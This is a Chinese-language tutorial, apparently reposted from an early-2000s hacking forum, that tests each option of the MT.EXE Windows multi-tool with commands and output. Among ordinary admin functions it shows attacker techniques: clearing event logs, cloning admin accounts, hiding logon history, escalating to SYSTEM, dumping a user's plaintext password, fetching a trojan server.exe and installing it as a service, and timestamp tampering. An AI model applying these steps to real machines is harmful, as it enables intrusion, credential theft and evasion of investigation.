MT.EXE 中文使用教程

页面导航:首页 > 网络安全 > 工具使用 > MT.EXE 中文使用教程

MT.EXE 中文使用教程

来源:互联网 作者:脚本宝典 时间:2015-07-19 14:36 【

mt.exe下载 D:\mt.exe Usage: mt.exe Opintion Opintion : -filter ---Change TCP/IP filter to on/off status. -addport ---Add ports to the filter allowed portlist. -setport ---Set ports as the filter allowed portlist. -nicinfo ---List TCP/IP i

mt.exe下载
D:\>mt.exe 
Usage: mt.exe <Opintion> 
Opintion : 
 -filter          ---Change TCP/IP filter to on/off status. 
 -addport         ---Add ports to the filter' allowed portlist. 
 -setport         ---Set ports as the filter' allowed portlist. 
 -nicinfo         ---List TCP/IP interface info. 
 -pslist          ---List active processes. 
 -pskill          ---Kill a specified process. 
 -dlllist         ---List dlls of a specified process. 
 -sysinfo         ---List system info. 
 -shutdown         ---Shutdown system. 
 -reboot          ---Reboot system. 
 -poweroff         ---Turn off power. 
 -logoff          ---Logoff current user's session. 
 -chkts          ---Check Terminal Service info. 
 -setupts         ---Install Terminal Service. 
 -remts          ---Remove Terminal Service. 
 -chgtsp          ---Reset Terminal Service port. 
 -clog           ---Clean system log. 
 -enumsrv         ---List all services. 
 -querysrv         ---List detail info of a specified service. 
 -instsrv         ---Install a service. 
 -cfgsrv          ---Changes the configuration of a service. 
 -remsrv          ---Remove a specified service. 
 -startsrv         ---Start a specified service. 
 -stopsrv         ---Stop a specified service. 
 -netget          ---Download from http/ftp. 
 -redirect         ---Port redirect. 
 -chkuser         ---List all account、sid and anti clone. 
 -clone          ---Clone from admin to dest. 
 -never          ---Set account looks like never logged on. 
 -killuser         ---Del account. Even "guest" account. 
 -su            ---Run process as Local_System privilege. 
 -findpass         ---Show all logged on user's pass. 
 -netstat         ---List TCP connections. 
 -killtcp         ---Kill TCP connection. 
 -psport          ---Map ports to processes. 
 -touch          ---Set the file times for a specified file. 
 -secdel          ---Secure delete files and directory or zap free 
pace. 
 -regshell         ---Enter a console registry editor. 
 -chkdll          ---Detect gina dll backdoor. 
大家可以看见的是,.他的功能一共有34项,包含我们我们平时使用的大部分软件.下面我就来一项一项的测试,条件和能力有限,希望大家能够指出其中的不足. 
一,MT.EXE –filter 
Usage: 
MT -filter <ON&line;OFF>  ----Enabld&line;Disable TCP/IP Filter. 
从上面的说明可以知道,这个是打开关闭TCP/IP筛选的,我们先来试一下,输入命令: 
D:\>MT -FILTER on 
Enable TCP/IP Filter successful! 
这个时候我们看看试不试打开了TCP/IP筛选,打开网络连接选项,右键本地连接---Internet协议(TCP/IP)属性----高级---选项----TCP/IP筛选-----属性,我们看到的这样的情况,如图: 
可以看见,我们已经启用了这个TCP/IP筛选,再次输入命令: 
D:\>MT -FILTER off 
Disable TCP/IP Filter successful! 
查看属性: 
有了这个工具,我们就不必那样的麻烦的点击鼠标了,一切都很简单. 
二, D:\>mt -addport 
Usage: 
mt -addport <TCP&line;UDP> NIC PortList  ----Add ports to the allowed portlist. 
                     Use "-nicinfo" get Nic number first. 
从说明上面看,是增加端口列表中允许通讯的端口,还是和上面的一样,我们来看看这个功能是如何的强大: 
五, -pslist          ---List active processes. 
列出活动进程,经常用PSTOOLS的很熟悉这个功能了,在这里,我将这个工具和pstools的工具相比较,看看他们的功能怎么样? 
D:\>mt -pslist 
PID   Path 
0    [Idle Process] 
4    l[System] 
464   \SystemRoot\System32\smss.exe 
524   \??\C:\WINDOWS\system32\csrss.exe 
548   \??\C:\WINDOWS\system32\winlogon.exe 
592   C:\WINDOWS\system32\services.exe 
604   C:\WINDOWS\system32\lsass.exe 
780   C:\WINDOWS\system32\svchost.exe 
844   C:\WINDOWS\System32\svchost.exe 
876   C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe 
932   C:\WINDOWS\System32\svchost.exe 
960   C:\WINDOWS\System32\svchost.exe 
1128  C:\WINDOWS\System32\alg.exe 
1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
1188  D:\mysql\bin\mysqld-nt.exe 
1280  C:\WINDOWS\System32\nvsvc32.exe 
1728  C:\WINDOWS\Explorer.EXE 
212   C:\WINDOWS\System32\ctfmon.exe 
504   D:\Program Files\Microsoft Office\Office10\WINWORD.EXE 
924   D:\Program Files\MYIE2\myie.exe 
1348  C:\WINDOWS\System32\dllhost.exe 
1516  C:\WINDOWS\System32\dllhost.exe 
1856  C:\WINDOWS\System32\msdtc.exe 
1356  C:\WINDOWS\System32\cmd.exe 
1004  C:\WINDOWS\System32\conime.exe 
1748  D:\Program Files\HyperSnap-DX 5\HprSnap5.exe 
1272  D:\MT.exe 
我们使用PSLIST得到的结果: 
D:\hack>pslist 
PsList v1.12 - Process Information Lister 
Copyright (C) 1999-2000 Mark Russinovich 
Systems Internals - http://www.sysinternals.com 
Process information for LIN: 
Name     Pid Pri Thd Hnd  Mem   User Time  Kernel Time  Elapsed Time 
Idle      0  0  1  0   20  0:00:00.000  0:40:22.453  0:00:00.000 
System     4  8 56 258   40  0:00:00.000  0:00:06.098  0:00:00.000 
smss     464 11  3  21   44  0:00:00.010  0:00:00.100  0:43:10.565 
csrss    524 13 11 416  3892  0:00:02.042  0:00:14.240  0:43:06.449 
winlogon   548 13 19 443  1044  0:00:01.171  0:00:01.882  0:43:04.185 
services   592  9 21 307  940  0:00:00.721  0:00:01.662  0:43:01.582 
lsass    604  9 19 304  1132  0:00:00.540  0:00:00.690  0:43:01.532 
svchost   780  8  8 255  824  0:00:00.200  0:00:00.160  0:42:58.687 
svchost   844  8 55 1214  5740  0:00:02.393  0:00:01.932  0:42:58.457 
StyleXPSer  876  8  2  38  416  0:00:00.110  0:00:00.070  0:42:58.357 
svchost   932  8  5  46  396  0:00:00.020  0:00:00.040  0:42:56.705 
svchost   960  8  7  90  204  0:00:00.060  0:00:00.040  0:42:56.244 
alg     1128  8  5 116  220  0:00:00.020  0:00:00.060  0:42:49.144 
inetinfo  1160  8 17 281  864  0:00:00.210  0:00:00.330  0:42:49.054 
mysqld-nt  1188  8  6  81   76  0:00:00.010  0:00:00.050  0:42:47.602 
nvsvc32   1280  8  3  74   92  0:00:00.090  0:00:00.160  0:42:45.378 
Explorer  1728  8 20 583 19548  0:00:11.436  0:00:27.519  0:42:37.607 
ctfmon    212  8  1 109  1596  0:00:00.340  0:00:01.031  0:42:26.982 
WINWORD   504  8  5 394 43428  0:01:04.072  0:00:25.757  0:41:26.194 
myie     924  8  9 312  3116  0:00:09.623  0:00:07.460  0:35:36.582 
dllhost   1348  8 23 240  1540  0:00:01.982  0:00:00.460  0:35:24.414 
dllhost   1516  8 15 200  784  0:00:00.190  0:00:00.230  0:35:22.912 
msdtc    1856  8 18 149  372  0:00:00.080  0:00:00.090  0:35:18.896 
cmd     1356  8  1  21  592  0:00:00.080  0:00:00.100  0:32:44.414 
conime   1004  8  1  25  664  0:00:00.050  0:00:00.030  0:32:42.652 
HprSnap5  1748  8  6 168  1648  0:00:01.932  0:00:03.414  0:18:38.798 
cmd     1548  8  1  20  1392  0:00:00.020  0:00:00.010  0:00:28.020 
pslist   1716  8  2  82  1672  0:00:00.030  0:00:00.050  0:00:00.400 
使用PULIST得到的结果: 
E:\HACK>pulist 
Process      PID User 
Idle       0 
System      4 
smss.exe     464 NT AUTHORITY\SYS 
csrss.exe     524 NT AUTHORITY\SYS 
winlogon.exe   548 NT AUTHORITY\SYS 
services.exe   592 NT AUTHORITY\SYS 
lsass.exe     604 NT AUTHORITY\SYS 
svchost.exe    780 NT AUTHORITY\SYS 
svchost.exe    844 NT AUTHORITY\SYS 
StyleXPService.exe 876 NT AUTHORITY\SY 
svchost.exe    932 
svchost.exe    960 
alg.exe      1128 
inetinfo.exe   1160 NT AUTHORITY\SYS 
mysqld-nt.exe   1188 NT AUTHORITY\SYS 
nvsvc32.exe    1280 NT AUTHORITY\SYS 
Explorer.EXE   1728 LIN\lin 
ctfmon.exe    212 LIN\lin 
WINWORD.EXE    504 LIN\lin 
MyIE.exe     924 LIN\lin 
dllhost.exe    1348 
dllhost.exe    1516 NT AUTHORITY\SYS 
msdtc.exe     1856 
cmd.exe      1356 LIN\lin 
conime.exe    1004 LIN\lin 
HprSnap5.exe   1748 LIN\lin 
cmd.exe      1548 LIN\lin 
pulist.exe    1788 LIN\lin 
从上面的情况可以知道,输入MT还没有PSLIST功能的强大,能够列出Name,Pid,Pri,Thd Hnd,Mem,User Time,Kernel Time,Elapsed Time,但是较于PULIST,已经是很好的了,能够列出进程名和运行路径,已经能够满足我们平时的使用了. 
六, D:\>mt -pskill 
Usage: 
mt -pskill <PID&line;ProcessName> 
同样也是PSTOOLS的工具之一了,我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,首先是使用MT,通过上面的MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入: 
D:\>mt -pskill 924 
Kill process sccuessful! 
很快,MYIE就消失了,也就是被KILL了,再使用PSKILL.EXE,我们表示公平统一性,我们还是有PSLIST取得MYIE的PID值,重新打开MYIE,得到它的PID值为220,我们输入: 
D:\hack>pskill 220 
PsKill v1.03 - local and remote process killer 
Copyright (C) 2000 Mark Russinovich 
http://www.sysinternals.com 
Process 220 killed. 
同样也是很快被KILL,说明MT和PSKILL的功能是一样的,使用MT也可以达到和PSKILL一样的效果. 
我们发现MT一个比较弱的功能的就是没有和PSKILL一样支持网络功能,在PSKILL中可以通过pskill [\\RemoteComputer [-u Username]] <process Id or name> 
  -u  Specifies optional user name for login to 
     remote computer. 
杀死远程的计算机进程,当然,我们不可能指望MT也能有这样强大的功能,毕竟我们用的仅仅才只有40K. 
七, D:\>mt -dlllist 
Usage: 
mt -dlllist <PID&line;ProcessName> 
列出进程中相关的DLL文件,于这个相关功能的软件我没有找到,不过我们使用Windows优化大师,我们先来测试一下,这次我们选中的进程是StyleXPService.exe.还是使用MT –pslist得到其PID值876,输入: 
D:\>mt -dlllist 876 
C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe 
C:\WINDOWS\System32\ntdll.dll 
C:\WINDOWS\system32\kernel32.dll 
C:\WINDOWS\system32\USER32.dll 
C:\WINDOWS\system32\GDI32.dll 
C:\WINDOWS\system32\ADVAPI32.dll 
C:\WINDOWS\system32\RPCRT4.dll 
C:\WINDOWS\system32\ole32.dll 
C:\WINDOWS\system32\OLEAUT32.dll 
C:\WINDOWS\system32\MSVCRT.DLL 
C:\WINDOWS\system32\VERSION.dll 
C:\WINDOWS\System32\SETUPAPI.dll 
C:\WINDOWS\System32\NETAPI32.dll 
C:\WINDOWS\System32\IMM32.DLL 
C:\WINDOWS\System32\LPK.DLL 
C:\WINDOWS\System32\USP10.dll 
C:\WINDOWS\System32\UXTHEME.DLL 
C:\WINDOWS\System32\rsaenh.dll 
打开Windows优化大师,看看它得到的相关DLL文件是什么?如图: 
使用MT得到的DLL相关文件和Windows优化大师的是一摸一样的,我们可以肯定使用MT绝对比使用Windows优化大师方便快捷. 
八, mt –sysinfo 
列出系统信息,还是使用Windows优化大师与之作比较,发现几乎没有任何的失误,可见准确性特别强的,由于页面的关系,数据不再展示. 这个功能和程序sysinfo.exe是一样的. 
九,  -shutdown         ---Shutdown system. 
-reboot          ---Reboot system. 
  -poweroff         ---Turn off power. 
  -logoff          ---Logoff current user's session. 
这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机,我已经试过了,幸亏还记得保存. 
十,  -chkts          ---Check Terminal Service info. 
 -setupts         ---Install Terminal Service. 
 -remts          ---Remove Terminal Service. 
 -chgtsp          ---Reset Terminal Service port. 
这4个命令是和Terminal相关的,由于没有安装服务器版本的系统,所以没有测试. 
十一,  -clog           ---Clean system log. 
用来清除记录,我们输入: 
D:\>mt -clog 
Usage: 
mt -clog <app&line;sec&line;sys&line;all>   ---Clean Application&line;Security&line;System&line;All logs. 
从上面的可以看出,我们可以清除 “应用程序” “安全性” “系统”3个日志,我随便选择一个,用MT删除 “应用程序”日志,输入: 
D:\>mt -clog app 
Clean EventLog : Application successful! 
打开事件查看器,如图, 
可以看出日志已经被清空,不过MT并不能和小榕的Cleariislog相比,不能删除指定IP的日志,这个可能是yy3并没有考虑将这个工具用作那样的用途. 
十二,  -enumsrv         ---List all services. 
列出所有的服务,这个测试可能你的不同,因为我已经删除了很多的服务的了,为了精简系统和提升速度,还是来看看, 
D:\>mt -enumsrv 
Usage: 
mt -enumsrv <SRV&line;DRV>     ----List all Win32&line;Driver Service 
D:\>mt -enumsrv srv 
Num  ServiceName       DisplayName 
0  Alerter         Alerter 
1  ALG           Application Layer Gateway Service 
2  AppMgmt         Application Management 
3  aspnet_state      ASP.NET State Service 
4  AudioSrv        Windows Audio 
(省略以下大部分的内容) 
D:\>mt -enumsrv drv 
Num  ServiceName       DisplayName 
0  Abiosdsk        Abiosdsk 
1  abp480n5        abp480n5 
2  ACPI          Microsoft ACPI Driver 
3  ACPIEC         ACPIEC 
4  adpu160m        adpu160m 
5  aec           Microsoft Kernel Acoustic Echo Canceller 
6  AFD           AFD 网络支持环境 
7  Aha154x         Aha154x 
8  aic78u2         aic78u2 
(省略以下大部分的内容) 
实在是太多了,也不想说什么了,只有一个字----高. 
十三,  D:\>mt -querysrv 
Usage: 
mt -querysrv <ServiceName>   ----Show detial info of a specifies service. 
列出服务的详细信息,我们查看系统进程Alerter的信息,输入: 
D:\>mt -querysrv Alerter 
ServiceName:  Alerter 
Status:    Stopped 
ServiceType:  Win32 Share Service 
Start type:  Demand Start 
LogonID:    NT AUTHORITY\LocalService 
FilePath :   C:\WINDOWS\System32\svchost.exe -k LocalService 
DisplayName:  Alerter 
Dependency:  LanmanWorkstation 
Description:  通知所选用户和计算机有关系统管理级警报。如果服务停止,使用管理警 
报的程序将不会受到它们。如果此服务被禁用,任何直接依赖它的服务都将不能启动。Start type:  Demand Start 
LogonID:    NT AUTHORITY\LocalService 
FilePath :   C:\WINDOWS\System32\alg.exe 
DisplayName:  Application Layer Gateway Service 
Dependency: 
Description:  为 Internet 连接共享和 Internet 连接防火墙提供第三方协议插件的支 
持 
实在是很清楚了,当然我们也可以使用mmc查看服务的详细信息,如图: 
再一次看见这个参数了,上次已经忘记的了. 
十四,  -instsrv         ---Install a service. 
 -cfgsrv          ---Changes the configuration of a service. 
 -remsrv          ---Remove a specified service. 
 -startsrv         ---Start a specified service. 
 -stopsrv         ---Stop a specified service. 
这写命令四和服务相关的,放在一起测试了,服务程序选择了冰河的服务端server.exe,我现在要作的是将这个工具作为服务安装,然后改变配置,开始服务,停止服务等,输入: 
十五, D:\>mt -netget 
Usage: 
   mt -netget <url> <filename to saved>    ---Download from http/ftp. 
这个工具很是实用,直到几个月前,还在安全焦点的论坛上面看见有人需要这样的工具,不过那个时候他们提供的是VBS文件,可惜我现在已经找不到那些代码了,在DOS下下载软件的东西,特别的方便.打建IIS服务器,把server.exe文件放置在根目录下面,在DOS下面输入 
D:\>mt -netget http://192.168.0.1/server.exe f:\server.exe 
Download File from http://192.168.0.1/server.exe to f:\server.exe. 
Download completed   272992 bytes ...... 
Downloaded  266.6KB  at 266 dot 6KB/S in 0sec. 
File <f:\server.exe> TotalByte : 266 KB. 
将下载回来的server.exe文件保存在F盘server.exe文件. 
十六, D:\>mt -redirect 
Usage: 
mt -redirect <TargetIP> <TargetPort> <ListenPort>  ----TCP port redirector. 
这个功能和FPIPE是一样的,实现端口转换,我们这样测试,将192.168.0.1主机的80端口转化为81端口,这样输入: 
D:\>mt -redirect 192.168.0.1 80 81 

------Waiting Connection----- 
然后另外开一个CMD,telnet到192.168.0.1的81端口,看到这样的情况,第一个CMD显示出了连接的信息, 
D:\>mt -redirect 192.168.0.1 80 81 

------Waiting Connection----- 

Accept client==>192.168.0.1:3027 
connect to 192.168.0.1 80 success! 
Thread 1988 recv 2 bytes. 
Thread 1988 send 2 bytes. 
Thread 1988 recv 2 bytes. 
Thread 1988 send 2 bytes. 
Thread 316 recv 224 bytes. 
Thread 316 send 224 bytes. 
而第二个CMD也显示出了我们需要得到的信息: 
HTTP/1.1 400 Bad Request 
Server: Microsoft-IIS/5.1 
Date: Wed, 19 May 2004 13:28:53 GMT 
Content-Type: text/html 
Content-Length: 87 
<html><head><title>Error</title></head><body>The parameter is incorrect. </body> 
</html> 
不过这个功能有一点不稳定,也就是说,有时候可以,有时候又不可以,这次的成功也是重新启动以后才出现的,相对于FPIPE,是方便了很多了,置于FPIPE.exe的用法,实在是让我头痛了几天. 
17, D:\>mt -clone 
Usage: 
mt -clone <SourUser> <DestUser> 
克隆账号,有点象小榕的cloneuser,测试一下,新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入: 
D:\hack>mt -clone lin yun 
Fail to Open SAM Key, 操作成功完成。 
D:\>mt -clone lin yun 
Fail to Open SAM Key, 操作成功完成。 
可能是不支持XP系统,虽然提示说操作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己操作失败吧. 
18, D:\>mt -never 
 -never          ---Set account looks like never logged on. 
它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入 
D:\>mt -never 316 
Require System Privilege.提示没有权限,于是 
D:\>mt -su 
打开新的CMD窗口,输入 
Microsoft Windows XP [版本 5.1.2600] 
(C) 版权所有 1985-2001 Microsoft Corp. 
C:\WINDOWS\system32>d: 
D:\>mt -never 316 
Fail to Set F Value. 
D:\>net user 316 
用户名         316 
全名          316 
注释 
用户的注释 
国家(地区)代码     000 (系统默认值) 
帐户启用        Yes 
帐户到期        从不 
上次设置密码      2004/5/19 下午 08:22 
密码到期        从不 
密码可更改       2004/5/19 下午 08:22 
需要密码        Yes 
用户可以更改密码    Yes 
允许的工作站      All 
登录脚本 
用户配置文件 
主目录 
上次登录        从不 
可允许的登录小时数   All 
本地组成员       *Users 
全局组成员       *None 
命令成功完成。 

D:\> 
可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的,只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统. 
成功条件:你要有local system权限 
18,  -killuser         ---Del account. Even "guest" account. 
删除用户,输入D:\>mt -killuser ziqi 
Kill User: ziqi Success! 
这个功能有一点问题,输入提示已经删除了,可是然后事实上,这个用户并没有删除,我们输入 
D:\>net user 
\\LIN 的用户帐户 
------------------------------------------------------------------------------- 
316           Administrator      ASPNET 
Guest          HelpAssistant      IUSR_IMAGE 
IWAM_IMAGE        lin           SUPPORT_388945a0 
ziqi 
命令成功完成。 
还是能够看见ziqi的账号,打开控制面板,用户账号,还是能看见这个用户的身影: 
但是如果我们以下面这种方式登陆,也就是先运行MT –su得到系统最高权限,在这个CMD下,我们就可以删除账号了,同时也可以删除GUEST用户,虽然我还没有激活这个账号,不知道是什么原因,因为我本身登陆的就已经是administrator组了.删除GUEST的过程: 
D:\>mt -killuser guest 
Kill User: guest Success! 
D:\>net user 
\\ 的用户帐户 
------------------------------------------------------------------------------- 
316           Administrator      ASPNET 
HelpAssistant      IUSR_IMAGE        IWAM_IMAGE 
lin           SUPPORT_388945a0     yun 
命令运行完毕,但发生一个或多个错误。 
19,  -su            ---Run process as Local_System privilege. 
以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了. 
20 -regshell         ---Enter a console registry editor. 
以CMD的方式编辑注册表,输入在CMD下不是很方便,不过有时候也是很使用的,输入: 
D:\>mt -regshell 
HKLM\>dir 
<SubKey>   HARDWARE 
<SubKey>   SAM 
<SubKey>   SECURITY 
<SubKey>   SOFTWARE 
<SubKey>   SYSTEM 
               Total: 5 SubKey, 0 Value. 
HKLM\>quitreg 
D:\> 
和真实环境没有什么区别. 
21, -netstat         ---List TCP connections. 
列出所有的TCP连接,我让192.168.0.2打开IE,访问192.168.0.1的主页,然后输入: 
D:\>mt -netstat 
Num LocalIP      Port  RemoteIP     PORT  Status 
11  192.168.0.1    80   192.168.0.2    1050  Established 
如果使用的是系统自带的netstat,得到的结果是一样的: 
D:\>netstat 
Active Connections 
Proto Local Address     Foreign Address    State 
TCP  LIN:http        192.168.0.2:1050    ESTABLISHED 
只是使用MT能够更直接,更容易理解,比如使用端口80代替使用协议HTTP. 
22, D:\>mt -killtcp 
Usage: 
mt -killtcp <ConnectionNum>  ----Kill a specifies TCP connection. 
和上面的搭配用,如果先KILL192.168.0.2对本机(192.168.0.1)的连接,可以输入: 
D:\>mt -killtcp 11 
Waiting connection to be close now. 
这个时候再输入: 
D:\>mt -netstat 
Num LocalIP      Port  RemoteIP     PORT  Status 
D:\> 
已经看不到有它的连接了. 
23,  -chkdll          ---Detect gina dll backdoor. 
检查gina木马后门,这个问题以前是很流行了,所以也被考虑进来了,使用很简单: 
D:\>mt -chkdll 
GinaDll not found. 
Winlogon Notification Package Dll: 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain 
crypt32.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet 
cryptnet.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll 
cscdll.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp 
wlnotify.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule 
wlnotify.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy 
sclgntfy.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn 
WlNotify.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv 
wlnotify.dll 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon 
wlnotify.dll 
Please make sure if they were backdoors. 
如果我安装了GINA木马,会出现这样的情况: 
D:\>mt -chkdll 
GinaDll exist: 
   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll 
c:\windows\system32\ntshellgina.dll 
很快就被检测出来了,实在是很方便,呵呵,其实我那个DLL文件早就被KILL了,只是修改了一下注册表而已,不过也显示了这个工具的强大性. 
24,  -psport          ---Map ports to processes. 
显示进程的端口,这个功能和哪个工具的功能一样的呢,呵呵,忘记了,对了是FPORT.EXE,呵呵,很久没有用了,还是来看看他们有什么不同的地方: 
D:\>mt -psport 
Proto  Listen        PID   Path 
TCP   0.0.0.0:80      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
TCP   0.0.0.0:135      780   C:\WINDOWS\system32\svchost.exe 
TCP   0.0.0.0:443      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
TCP   0.0.0.0:1025     1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
TCP   0.0.0.0:1026     4    [System] 
TCP   0.0.0.0:3025     960   C:\WINDOWS\System32\svchost.exe 
TCP   0.0.0.0:3027     1252  C:\WINDOWS\System32\msdtc.exe 
TCP   0.0.0.0:3306     1176  D:\mysql\bin\mysqld-nt.exe 
TCP   127.0.0.1:3001    1120  C:\WINDOWS\System32\alg.exe 
TCP   127.0.0.1:3002    844   C:\WINDOWS\System32\svchost.exe 
TCP   127.0.0.1:3003    844   C:\WINDOWS\System32\svchost.exe 
TCP   192.168.0.1:139    4    [System] 
TCP   192.168.0.1:3011   4    [System] 
UDP   0.0.0.0:500      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
UDP   0.0.0.0:3456     780   C:\WINDOWS\system32\svchost.exe 
UDP   127.0.0.1:3020    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
UDP   127.0.0.1:3026    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
UDP   192.168.0.1:137    4    [System] 
UDP   192.168.0.1:138    960   C:\WINDOWS\System32\svchost.exe 
使用FPORT.EXE得到下面的结果 
E:\HACK>fport /ap 
FPort v2.0 - TCP/IP Process to Port Mapper 
Copyright 2000 by Foundstone, Inc. 
http://www.foundstone.com 
Pid  Process      Port Proto Path 
1120         -> 3001 TCP 
960         -> 3025 TCP 
1252         -> 3027 TCP 
4   System     -> 1026 TCP 
4   System     -> 139  TCP 
4   System     -> 3011 TCP 
1160 inetinfo    -> 1025 TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
1160 inetinfo    -> 443  TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
1160 inetinfo    -> 80  TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
844  svchost    -> 3002 TCP  C:\WINDOWS\System32\svchost.exe 
844  svchost    -> 3003 TCP  C:\WINDOWS\System32\svchost.exe 
780  svchost    -> 135  TCP  C:\WINDOWS\system32\svchost.exe 
1176 mysqld-nt   -> 3306 TCP  D:\mysql\bin\mysqld-nt.exe 
960         -> 138  UDP 
4   System     -> 137  UDP 
1160 inetinfo    -> 3020 UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
1160 inetinfo    -> 3026 UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
1160 inetinfo    -> 500  UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe 
780  svchost    -> 3456 UDP  C:\WINDOWS\system32\svchost.exe 
基本上差不多了,不过感觉好像FPORT更加强大一点,因为我现在在FPORT中用了参数,为了使2个更容易对比一些. 
这里还有一个比较好的软件,使GUI的,抓图下来如下: 
24,  -touch          ---Set the file times for a specified file. 
查看文件修改时间,下载或者COPY,转移会改变文件的最后修改时间,而使用这个命令可以查看文件的最后修改时间,举个例子,我们现在看到的文件mt.exe,如图, 
而事实上,我们使用下面的命令: 
D:\>mt -touch mt1.exe 
Set FileTime Successful. 
CreationTime  : 07/10/2002 
LastAccessTime : 19/05/2004 
LastWriteTime : 07/10/2002 
可以知道其创建时间不使2004年5月19日,而是CreationTime  : 07/10/2002,相信这个也就使yy3写这个程序的时间了.与这个相关的软件有偷touch.exe,可以我电脑里面的这个文件已经本病毒破坏了。 
25,  -chkuser         ---List all account、sid and anti clone. 
这个功能,测试不了,虽然说使列出所有的用户,SID和反克隆设置,但是,一旦输入,就有错误发生 
26,  -findpass         ---Show all logged on user's pass. 
得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码: 
G:\WINNT\system32>mt -findpass 
mt -findpass 
The logon information : 
   Domain  : 316-2AS8L1B1FL5 
   Username : Administrator 
   Password : winyaj 
G:\WINNT\system32> 
这个比findpass.exe还方便一些,不需要知道用户进程的PID值. 
后记:MT确实是一个很不错的工具,它能够让我们很容易的做很多事情,而不用到处去找相关的软件, 
很多朋友都问在哪里可以下载?事实上现在在网络上面是找不到这个程序的,因为这个程序是yy3给我测试的,没经过他的同意,我也不敢随便发布在网络上面。所以想要的朋友麻烦留下你们的E-mail信箱,我会给没一个朋友发一份,同时也希望能帮忙测试,发现一些BUG什么的。还有就是不要随便乱发就是了,自己用真的很不错的,到时候yy3怪下来我真的恐怕承受不起。

Tags:

相关文章

    文章评论

    最 近 更 新
    热 点 排 行
    Js与CSS工具
    代码转换工具
    
    <